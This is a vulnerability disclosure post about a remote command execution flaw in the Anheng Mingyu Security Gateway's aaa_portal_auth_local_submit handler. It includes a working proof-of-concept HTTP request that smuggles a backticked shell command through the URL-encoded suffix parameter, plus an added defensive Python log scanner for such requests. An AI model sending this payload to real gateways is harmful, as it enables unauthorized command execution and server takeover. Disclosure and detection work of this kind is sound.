Anheng Mingyu Security Gateway aaa_portal_auth_local_submit Remote Command Execution Vulnerability
Vulnerability Description
The Anheng Mingyu Security Gateway has a remote command execution vulnerability in aaa_portal_auth_local_submit, through which an attacker can obtain server permissions.
Vulnerability Impact
Anheng Mingyu Security Gateway
Network surveying and mapping
Vulnerability reproduction
Login page
Verification PoC
GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%7B%7Burlenc%28%60id%20%3E%2Fusr%2Flocal%2Fwebui%2Ftest.txt%60%29%7D%7D HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
/test.txt
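A defender's view of the request above, as an added example that is not part of the original post: a Python log check that flags calls to aaa_portal_auth_local_submit whose suffix parameter decodes to shell metacharacters. It assumes access logs in common/combined format and that legitimate suffix values are plain tokens; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

HANDLER = "aaa_portal_auth_local_submit"
# Assumption: a legitimate portal "suffix" is a plain token, so any shell
# metacharacter (backtick, $, ;, |, &, redirects, brackets) is suspicious.
SHELL_META = re.compile(r"[`$;|&<>(){}\\\r\n]")
# Assumption: common/combined log format with a quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IPs); the first replays the request above.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /webui/?g=aaa_portal_auth_local_submit'
    '&bkg_flag=0&suffix=%7B%7Burlenc%28%60id%20%3E%2Fusr%2Flocal%2Fwebui%2Ftest.txt%60%29%7D%7D'
    ' HTTP/1.1" 200 12',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /webui/?g=aaa_portal_auth_local_submit'
    '&bkg_flag=0&suffix=guest01 HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /webui/?g=login HTTP/1.1" 200 900',
]

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so multiply-encoded values are normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def suspicious_suffix(log_line):
    """Return the decoded suffix when the handler is called with shell metacharacters."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    params = parse_qs(url.query, keep_blank_values=True)
    if not url.path.startswith("/webui") or HANDLER not in params.get("g", []):
        return None
    for raw in params.get("suffix", []):  # parse_qs has already decoded once
        decoded = fully_unquote(raw)
        if SHELL_META.search(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line_number, decoded_suffix) for every suspicious request."""
    hits = [(n, suspicious_suffix(line)) for n, line in enumerate(lines, 1)]
    return [(n, s) for n, s in hits if s is not None]

if __name__ == "__main__":
    for n, suffix in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious suffix {suffix!r}")
```

The same pattern can be expressed as a WAF or reverse-proxy rule that rejects the request before it reaches the gateway's web UI.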
This post is licensed under CC BY 4.0 by the author.